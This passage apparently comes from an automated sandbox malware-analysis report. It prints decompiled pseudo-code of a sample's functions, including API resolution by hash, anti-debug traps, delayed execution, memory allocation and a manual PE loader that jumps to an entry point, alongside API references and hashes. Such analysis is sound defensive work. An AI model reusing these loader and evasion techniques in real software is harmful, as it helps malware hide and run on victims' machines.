						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6E7D35F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6E7D0FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6E7D306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6E7D0FD4(_t403, _t413, _t403);
								}
								E6E7CF654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6E7CBB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6E7CBB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6e7d073f
0x6e7d0741
0x6e7d0748
0x6e7d0fc7
0x6e7d0fcd
0x6e7d0fcd
0x6e7d0752
0x6e7d075e
0x6e7d076a
0x6e7d076f
0x6e7d077c
0x6e7d078d
0x6e7d078f
0x6e7d0790
0x6e7d0791
0x6e7d0791
0x6e7d0792
0x6e7d0796
0x6e7d079a
0x6e7d079f
0x6e7d07a2
0x6e7d07a8
0x6e7d07c2
0x6e7d07c9
0x6e7d07cc
0x6e7d07cf
0x6e7d07d1
0x6e7d07dd
0x6e7d07ea
0x6e7d07f7
0x6e7d07fb
0x6e7d0887
0x6e7d0887
0x6e7d0889
0x6e7d088d
0x6e7d0898
0x6e7d08ae
0x6e7d08b1
0x6e7d08b1
0x6e7d08b5
0x6e7d08be
0x6e7d08c3
0x6e7d08c3
0x6e7d08c5
0x6e7d08d6
0x6e7d08f8
0x6e7d08fa
0x6e7d08fb
0x6e7d08ff
0x6e7d08ff
0x6e7d0908
0x6e7d0914
0x6e7d091d
0x6e7d0933
0x6e7d0943
0x6e7d0948
0x6e7d094c
0x6e7d0951
0x6e7d0953
0x6e7d09a3
0x6e7d09b8
0x6e7d09bc
0x6e7d09c1
0x6e7d09d2
0x6e7d09e7
0x6e7d09eb
0x6e7d09f0
0x6e7d09f2
0x6e7d0a39
0x6e7d0a3c
0x6e7d0a8a
0x6e7d0a8d
0x6e7d0ace
0x6e7d0ad2
0x6e7d0ad7
0x6e7d0adc
0x6e7d0afb
0x6e7d0afb
0x6e7d0afb
0x6e7d0afd
0x00000000
0x6e7d0afd
0x6e7d0ade
0x6e7d0ae2
0x6e7d0ae4
0x6e7d0aeb
0x6e7d0aeb
0x6e7d0af1
0x6e7d0af1
0x6e7d0af3
0x6e7d0af6
0x6e7d0af6
0x00000000
0x6e7d0af3
0x6e7d0ae6
0x6e7d0ae9
0x6e7d0aef
0x6e7d0aef
0x00000000
0x6e7d0aef
0x00000000
0x6e7d0ae9
0x6e7d0a8f
0x6e7d0a92
0x00000000
0x00000000
0x6e7d0a98
0x6e7d0a9d
0x6e7d0aa2
0x6e7d0ac1
0x6e7d0ac1
0x6e7d0acb
0x00000000
0x6e7d0acb
0x6e7d0aa4
0x6e7d0aa8
0x6e7d0aaa
0x6e7d0ab1
0x6e7d0ab1
0x6e7d0ab7
0x6e7d0ab7
0x6e7d0ab9
0x6e7d0abc
0x6e7d0abc
0x00000000
0x6e7d0ab9
0x6e7d0aac
0x6e7d0aaf
0x6e7d0ab5
0x6e7d0ab5
0x00000000
0x6e7d0ab5
0x00000000
0x6e7d0aaf
0x6e7d0a3e
0x6e7d0a40
0x6e7d0a7f
0x6e7d0a82
0x6e7d0df4
0x6e7d0df9
0x6e7d0dfe
0x6e7d0e1d
0x6e7d0e1d
0x6e7d0e27
0x00000000
0x6e7d0e27
0x6e7d0e00
0x6e7d0e04
0x6e7d0e06
0x6e7d0e0d
0x6e7d0e0d
0x6e7d0e13
0x6e7d0e13
0x6e7d0e15
0x6e7d0e18
0x6e7d0e18
0x00000000
0x6e7d0e15
0x6e7d0e08
0x6e7d0e0b
0x6e7d0e11
0x6e7d0e11
0x00000000
0x6e7d0e11
0x00000000
0x6e7d0e0b
0x00000000
0x6e7d0a88
0x6e7d0a46
0x6e7d0a4b
0x6e7d0a50
0x6e7d0a6f
0x6e7d0a6f
0x6e7d0a79
0x00000000
0x6e7d0a79
0x6e7d0a52
0x6e7d0a56
0x6e7d0a58
0x6e7d0a5f
0x6e7d0a5f
0x6e7d0a65
0x6e7d0a65
0x6e7d0a67
0x6e7d0a6a
0x6e7d0a6a
0x00000000
0x6e7d0a67
0x6e7d0a5a
0x6e7d0a5d
0x6e7d0a63
0x6e7d0a63
0x00000000
0x6e7d0a63
0x00000000
0x6e7d0a5d
0x6e7d09f4
0x6e7d09f6
0x00000000
0x00000000
0x6e7d0a00
0x6e7d0a05
0x6e7d0a0a
0x6e7d0a29
0x6e7d0a29
0x6e7d0a33
0x00000000
0x6e7d0a33
0x6e7d0a0c
0x6e7d0a10
0x6e7d0a12
0x6e7d0a19
0x6e7d0a19
0x6e7d0a1f
0x6e7d0a1f
0x6e7d0a21
0x6e7d0a24
0x6e7d0a24
0x00000000
0x6e7d0a21
0x6e7d0a14
0x6e7d0a17
0x6e7d0a1d
0x6e7d0a1d
0x00000000
0x6e7d0a1d
0x00000000
0x6e7d0a17
0x6e7d0959
0x6e7d095e
0x6e7d0963
0x6e7d0982
0x6e7d0982
0x6e7d098c
0x00000000
0x6e7d098c
0x6e7d0965
0x6e7d0969
0x6e7d096b
0x6e7d0972
0x6e7d0972
0x6e7d0978
0x6e7d0978
0x6e7d097a
0x6e7d097d
0x6e7d097d
0x00000000
0x6e7d097a
0x6e7d096d
0x6e7d0970
0x6e7d0976
0x6e7d0976
0x00000000
0x6e7d0976
0x00000000
0x6e7d089a
0x6e7d089c
0x6e7d0b01
0x6e7d0b06
0x6e7d0b09
0x6e7d0b0e
0x6e7d0b10
0x6e7d0b25
0x6e7d0b28
0x6e7d0bf6
0x6e7d0bfe
0x6e7d0c01
0x6e7d0c16
0x6e7d0c20
0x6e7d0c20
0x6e7d0c22
0x6e7d0c24
0x6e7d0c33
0x6e7d0c3f
0x6e7d0c43
0x6e7d0c46
0x6e7d0c49
0x6e7d0c4c
0x00000000
0x6e7d0c4c
0x6e7d0b38
0x6e7d0b4a
0x6e7d0b4e
0x6e7d0bda
0x6e7d0bda
0x6e7d0be0
0x6e7d0beb
0x6e7d0be2
0x6e7d0be2
0x6e7d0be2
0x00000000
0x6e7d0be0
0x6e7d0b5b
0x6e7d0b5c
0x6e7d0b5e
0x6e7d0b64
0x6e7d0fb3
0x6e7d0fb8
0x6e7d0fba
0x00000000
0x00000000
0x6e7d0fc0
0x6e7d0b7b
0x6e7d0b7f
0x6e7d0b84
0x6e7d0b96
0x6e7d0b9a
0x6e7d0ba5
0x6e7d0ba6
0x6e7d0ba7
0x6e7d0ba8
0x6e7d0baa
0x6e7d0bb5
0x6e7d0e2d
0x6e7d0e2d
0x6e7d0bb5
0x6e7d0bbb
0x6e7d0bc4
0x6e7d0e3f
0x6e7d0e55
0x6e7d0e57
0x6e7d0e59
0x6e7d0f94
0x6e7d0f9b
0x00000000
0x6e7d0f9b
0x6e7d0e68
0x6e7d0e76
0x6e7d0e90
0x6e7d0e92
0x6e7d0e94
0x6e7d0fa5
0x6e7d0faa
0x6e7d0fac
0x00000000
0x00000000
0x6e7d0fae
0x6e7d0ea8
0x6e7d0eb3
0x6e7d0ec2
0x6e7d0ed4
0x6e7d0ed6
0x6e7d0ed8
0x6e7d0ee5
0x6e7d0ee5
0x6e7d0ef5
0x6e7d0f06
0x6e7d0f0b
0x6e7d0f0d
0x6e7d0f0f
0x6e7d0f16
0x6e7d0f17
0x6e7d0f17
0x6e7d0f23
0x6e7d0f44
0x6e7d0f4d
0x6e7d0f59
0x6e7d0f65
0x6e7d0f6a
0x6e7d0f6f
0x6e7d0f75
0x6e7d0f75
0x6e7d0f7a
0x6e7d0f80
0x00000000
0x6e7d0f86
0x6e7d0f88
0x00000000
0x6e7d0f88
0x6e7d0bca
0x6e7d0bca
0x6e7d0bcf
0x6e7d0bd5
0x6e7d0bd5
0x00000000
0x6e7d0bcf
0x6e7d0bc4
0x6e7d0898
0x6e7d0808
0x6e7d0809
0x6e7d080b
0x6e7d0811
0x6e7d0dde
0x6e7d0de3
0x6e7d0de5
0x00000000
0x00000000
0x6e7d0deb
0x6e7d0828
0x6e7d082c
0x6e7d0831
0x6e7d0847
0x6e7d085e
0x6e7d0862
0x6e7d0c5a
0x6e7d0c5a
0x6e7d0862
0x6e7d0868
0x6e7d0871
0x6e7d0c69
0x6e7d0c7a
0x6e7d0c7f
0x6e7d0c81
0x6e7d0c83
0x6e7d0db4
0x6e7d0db8
0x00000000
0x6e7d0db8
0x6e7d0c8f
0x6e7d0cb4
0x6e7d0cb6
0x6e7d0cb8
0x6e7d0dd0
0x6e7d0dd5
0x6e7d0dd7
0x00000000
0x00000000
0x6e7d0dd9
0x6e7d0cc9
0x6e7d0cd7
0x6e7d0cde
0x6e7d0cdf
0x6e7d0ce0
0x6e7d0cf2
0x6e7d0cf4
0x6e7d0cf6
0x00000000
0x00000000
0x6e7d0cfe
0x6e7d0d19
0x6e7d0d1b
0x6e7d0d1d
0x6e7d0dc2
0x6e7d0dc7
0x6e7d0dc9
0x00000000
0x00000000
0x6e7d0dcb
0x6e7d0d23
0x6e7d0d2a
0x6e7d0d2e
0x6e7d0d99
0x6e7d0d99
0x6e7d0d9b
0x6e7d0da2
0x6e7d0da2
0x6e7d0da8
0x6e7d0da8
0x6e7d0daa
0x6e7d0daf
0x6e7d0daf
0x00000000
0x6e7d0daa
0x6e7d0d9d
0x6e7d0da0
0x6e7d0da6
0x6e7d0da6
0x00000000
0x6e7d0da6
0x00000000
0x6e7d0da0
0x6e7d0d30
0x6e7d0d30
0x6e7d0d32
0x6e7d0d3e
0x6e7d0d43
0x6e7d0d45
0x00000000
0x00000000
0x6e7d0d47
0x6e7d0d4b
0x6e7d0d52
0x6e7d0d53
0x6e7d0d54
0x6e7d0d56
0x00000000
0x00000000
0x6e7d0d58
0x6e7d0d5a
0x6e7d0d61
0x6e7d0d61
0x6e7d0d67
0x6e7d0d67
0x6e7d0d69
0x6e7d0d6e
0x6e7d0d6e
0x6e7d0d77
0x6e7d0d7c
0x6e7d0d81
0x6e7d0d87
0x6e7d0d87
0x6e7d0d8c
0x00000000
0x6e7d0d8c
0x6e7d0d5c
0x6e7d0d5f
0x6e7d0d65
0x6e7d0d65
0x00000000
0x6e7d0d65
0x00000000
0x6e7d0d93
0x6e7d0d93
0x6e7d0d94
0x6e7d0d94
0x00000000
0x6e7d0d32
0x6e7d0877
0x6e7d087c
0x6e7d0882
0x6e7d0882
0x00000000
0x6e7d0c59
0x6e7d0c59
0x6e7d0c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6E7D085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6E7D0C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6E7D0CB4

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: d5bcfedaa9ab12a0a7660b9e8580b08d794af3e8a50f639ede2ed01f568f5abd
Instruction ID: 8d48f098bcdb29ec9217f72c2efb0d85fec0d5d2a94ba5baa070d71d24ddaff9
Opcode Fuzzy Hash: d5bcfedaa9ab12a0a7660b9e8580b08d794af3e8a50f639ede2ed01f568f5abd
Instruction Fuzzy Hash: 0C22E570608341AFE760DFA4CA54BDF77AAAF81708F10992DE995971B4EB30D80DCB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D2234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6E7D2234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6E7D3AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6E7D306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6e7d2234
0x6e7d2238
0x6e7d2254
0x6e7d2257
0x6e7d223a
0x6e7d2249
0x6e7d224c
0x6e7d224c
0x6e7d2267
0x6e7d226c
0x6e7d2270
0x6e7d2278
0x6e7d2278
0x6e7d227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6E7C4B17,00000000,00000000,?), ref: 6E7D2278

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: d613b95019a34c546b222684583a9ea43caf17ade259988750dbea48b797ef51
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: 33E065B020E302BDE7449A689D04B6F36D8AF84610F21893DB468D7194E67094058761

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D2820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E7D2820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6E7D306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6e7d2827
0x6e7d2830
0x6e7d283e
0x6e7d2861
0x6e7d2861
0x6e7d2840
0x6e7d2857
0x6e7d285b
0x00000000
0x6e7d285d
0x6e7d285d
0x6e7d285d
0x6e7d285b
0x6e7d2866

APIs

NtAllocateVirtualMemory.NTDLL(6E7D88E6,?,00000000,000000FF,6E7D88E6,6E7D88E6,60A28C5C,60A28C5C,?,?,6E7D88E6,00003000,00000004,000000FF), ref: 6E7D2857

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: 0d23bbbe092875e13a3e448f94bffec0e9027a34582646c45c0142a7e740a006
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: 0CE03971209382AFEB08DA99CD24E6BB7E9EFC4605F108C2DB494C6260D730D8159B25

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D3138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E7D3138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6E7D34B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6e7d3138
0x6e7d313d
0x6e7d313f
0x6e7d3141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6E7D34B0,6E7D3128,60A28C5C,60A28C5C,?,6E7C6C99,00000000), ref: 6E7D313F

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: c00f33c5829bfc09aee2d9ed5d4395107a182010dae9e749ce7d24dcaf70192a
Instruction ID: c49e36dae779a2ea72f9f034bf82dde2252acfc1e894f826f9c40a2f1e87ca5c
Opcode Fuzzy Hash: c00f33c5829bfc09aee2d9ed5d4395107a182010dae9e749ce7d24dcaf70192a
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00A52092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00A52092(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				int _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t140;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t183;
				intOrPtr _t226;
				void* _t233;
				intOrPtr _t236;
				void* _t243;
				intOrPtr* _t247;
				unsigned int _t250;
				intOrPtr _t259;
				DWORD* _t271;
				void* _t275;
				intOrPtr* _t278;
				intOrPtr* _t279;

				_t140 = _a4;
				_v20 = 0;
				_t243 =  *((intOrPtr*)(_t140 + 0x44));
				 *0xa54418 = 1;
				asm("movaps xmm0, [0xa53010]");
				asm("movups [0xa54428], xmm0");
				_v48 = _t140;
				_v52 =  *((intOrPtr*)(_t140 + 0x48));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v188 = _t243;
				_v184 =  *((intOrPtr*)(_v48 + 0x58));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_t140 + 0x54));
				_v64 = 4;
				_v68 = _t243;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t271); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x58));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E00A51770();
				E00A517BD(_v68,  *((intOrPtr*)(_v48 + 0x28)), _v56);
				E00A51770( *((intOrPtr*)(_v48 + 0x28)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t278 = _t275 - 0x8c;
				_t233 = _v68;
				_t259 =  *((intOrPtr*)(_t233 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t233;
				_v108 = _t259;
				if(_t259 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v120 = _v104;
				if(_v60 != 0) {
					_v124 = 0;
					_v128 = _v120 + 0x18 + ( *(_v120 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v128;
						_t250 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t250 >> 0x1f;
						_v148 =  *((intOrPtr*)(_v140 + 8));
						_v188 = _v68 +  *((intOrPtr*)(_v140 + 0xc));
						_v184 = _v148;
						_v180 =  *((intOrPtr*)(0xa54418 + ((_t250 >> 0x0000001e & 0x00000001) << 4) + (_v144 << 3) + ((_t250 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v124;
						_t183 = VirtualProtect(??, ??, ??, ??); // executed
						_t278 = _t278 - 0x10;
						_t226 = _v152 + 1;
						_v156 = _t183;
						_v124 = _t226;
						_v128 = _v140 + 0x28;
						if(_t226 == _v60) {
							goto L8;
						}
					}
				}
				L8:
				 *_t278 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x24));
				_t159 = DisableThreadLibraryCalls(??);
				_t279 = _t278 - 4;
				_t236 =  *_v100;
				_v136 = _t159;
				_v112 = _t236;
				_v116 = _v68;
				if(_t236 != 0) {
					_v116 = _v68 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t247 = _v48;
				_v44 =  *((intOrPtr*)(_t247 + 0x50));
				_v40 =  *_t247;
				_v36 =  *((intOrPtr*)(_t247 + 0x18));
				_v32 =  *((intOrPtr*)(_t247 + 0x4c));
				_v28 =  *((intOrPtr*)(_t247 + 0x10));
				_v24 = _v132;
				 *_t279 = _t247;
				_v188 = 0;
				_v184 = 0x60;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x60;
				_v172 =  *((intOrPtr*)(_v116 + 0x28));
				E00A51770();
				if(_v172 != 0) {
					_t279 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x00a5209e
0x00a520ac
0x00a520b3
0x00a520b6
0x00a520c0
0x00a520c7
0x00a520d1
0x00a520d7
0x00a520e0
0x00a520e9
0x00a520ec
0x00a520f0
0x00a520f8
0x00a520ff
0x00a52102
0x00a52105
0x00a52108
0x00a5210b
0x00a52125
0x00a5212b
0x00a5212e
0x00a52136
0x00a5213a
0x00a5213d
0x00a52140
0x00a52143
0x00a52146
0x00a52162
0x00a5217f
0x00a521a4
0x00a521a6
0x00a521af
0x00a521b2
0x00a521bc
0x00a521bf
0x00a521c2
0x00a521c5
0x00a521c8
0x00a52216
0x00a52216
0x00a52249
0x00a5224c
0x00a5225c
0x00a5225f
0x00a522a8
0x00a522a8
0x00a522b7
0x00a522bf
0x00a522cd
0x00a522dc
0x00a5230d
0x00a52316
0x00a5231a
0x00a5231e
0x00a52325
0x00a5232b
0x00a5232d
0x00a52336
0x00a52347
0x00a5234d
0x00a52350
0x00a52353
0x00000000
0x00000000
0x00a52359
0x00a522a8
0x00a52264
0x00a52272
0x00a5227a
0x00a5227d
0x00a5227f
0x00a52285
0x00a52291
0x00a52297
0x00a5229a
0x00a5229d
0x00a521f9
0x00a521f9
0x00a5236e
0x00a52374
0x00a52379
0x00a5237f
0x00a52385
0x00a5238b
0x00a52391
0x00a52394
0x00a52397
0x00a5239f
0x00a523a7
0x00a523ad
0x00a523b3
0x00a523b9
0x00a523bf
0x00a523cd
0x00a521da
0x00a521e0
0x00a521e0
0x00a52234

APIs

VirtualProtect.KERNELBASE ref: 00A5210B
VirtualProtect.KERNELBASE ref: 00A521A4
VirtualProtect.KERNELBASE ref: 00A5232B

Strings

`, xrefs: 00A5239F

Memory Dump Source

Source File: 00000000.00000002.1191979360.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: `
API String ID: 544645111-2679148245
Opcode ID: 5975f7c061d87daa9c04d4cd91296e39dd19913eb7f0a38552bfd54504190487
Instruction ID: 1858ccdefb691d014fe6cbaeda8afcb46a748da0164e62678c3fba8bf14023dd
Opcode Fuzzy Hash: 5975f7c061d87daa9c04d4cd91296e39dd19913eb7f0a38552bfd54504190487
Instruction Fuzzy Hash: 34B1BEB5E003188FCB14CFA9C980A9DBBF1BF88304F15816AE958AB351D730A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5E84, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E7D5E84(void* __ecx, void* __eflags, void* _a4, char _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6E7CC280(_t19) == 0) {
					_t2 =  &_a8; // 0x6e7d5d79
					_v12 =  *_t2;
					if(E6E7D3064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6E7D35F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6e7d5e87
0x6e7d5e89
0x6e7d5e95
0x6e7d5e9b
0x6e7d5e9f
0x6e7d5eb5
0x6e7d5ed4
0x6e7d5eb7
0x6e7d5ec8
0x6e7d5ecc
0x6e7d5eec
0x6e7d5ece
0x6e7d5ece
0x6e7d5ece
0x6e7d5ecc
0x6e7d5ed5
0x6e7d5eda
0x6e7d5ee3
0x6e7d5edc
0x6e7d5edc
0x6e7d5ede
0x6e7d5ede
0x6e7d5e97
0x6e7d5e97
0x6e7d5e97
0x6e7d5ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6E7D5D79,00000000,?,00000000,?), ref: 6E7D5EC8

Strings

y]}n, xrefs: 6E7D5E9B

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID: y]}n
API String ID: 2738559852-1670170125
Opcode ID: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction ID: 6fce37af055b3fc7e81cc09ed0b157b6c4f21c2308fc964f420131d039ebe3c0
Opcode Fuzzy Hash: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction Fuzzy Hash: 78F03631258207EFD751FEA9AE10AAA77DDEF45254F144C3AA895CA160EA32D408CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D10A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E7D10A4(void* __ebx, void* __ecx) {
				intOrPtr* _t34;
				long* _t55;
				long* _t59;
				intOrPtr* _t64;
